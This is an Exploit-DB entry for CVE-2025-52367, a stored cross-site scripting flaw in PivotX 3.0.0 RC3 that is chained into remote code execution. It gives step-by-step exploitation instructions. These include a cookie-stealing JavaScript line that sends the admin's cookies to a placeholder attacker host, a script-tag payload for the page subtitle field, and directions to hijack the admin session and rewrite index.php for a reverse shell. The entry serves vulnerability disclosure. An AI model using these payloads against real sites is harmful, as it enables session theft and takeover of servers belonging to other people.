PivotX 3.0.0 RC3 - Remote Code Execution (RCE)

EDB-ID:

52361

CVE:

2025-52367

EDB Verified:

Author:

HayToN

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2025-07-16

Vulnerable App: 
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
# Date: July 2025
# Exploit Author: HayToN
# Vendor Homepage: https://github.com/pivotx
# Software Link: https://github.com/pivotx/PivotX
# Version: 3.0.0 RC3
# Tested on: Debian 11, PHP 7.4
# CVE : CVE-2025-52367

## Vulnerability Type:
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().

## Root Cause:
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.

Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML.

Note: If you are already admin, skip steps 1-7
## Exploitation Steps:
1. Login as an authenticated user (normal user, no need for admin).

2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page

3. Create locally a JavaScript file contaning cookie stealing code.
For example: lol.js
Containing:
document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;

4. In the "Subtitle" field, input the following payload(Be sure to change the file name as yours):

<script src="http://LOCAL_IP/lol.js"></script>

5. Publish the page.

6. When an admin views the published page in the blog, the XSS will execute in the admin’s context.

7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site.

8. Navigate as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit index.php file

9. Edit index.php file to any php file you want to gain RCE on the target, could be with reverse shell or any other method.

10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)

# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services